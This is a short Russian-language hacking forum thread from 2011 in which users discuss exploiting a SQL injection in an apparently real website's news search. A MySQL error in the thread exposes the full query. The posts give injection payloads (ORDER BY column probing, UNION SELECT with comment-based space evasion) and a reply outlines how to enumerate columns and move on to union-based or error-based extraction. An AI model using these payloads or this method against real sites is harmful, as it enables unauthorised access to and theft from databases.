28.10.2011, 15:05
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от IMMORTAL_S
Всем привет!
В строку поиска ввожу
qwe' asd
Получаю такое:
В строке поиска текст меняется на
qwe\' asd
Выводится ошибка:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1
Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc
Можно как-то раскрутить..? сам пробовал, что-то не получается
Код:
asd qwe'))ORDER/*wtf*/BY(10) --
Код:
asd qwe'))UNION(SELECT(1),(2),(3)from(table)) --
Сообщение от None
Видно же где неправильно ты делаешь то.
1') order by XXX--+
и подбираешь кол-во столбцов, меняешь на юнион и вуаля. Или order by XXX--+ меняешь на error-based sql inj
Очевидно же, что нельзя допускать пробелов, так как идет explode(' ', $some) и после implode.
|
|
|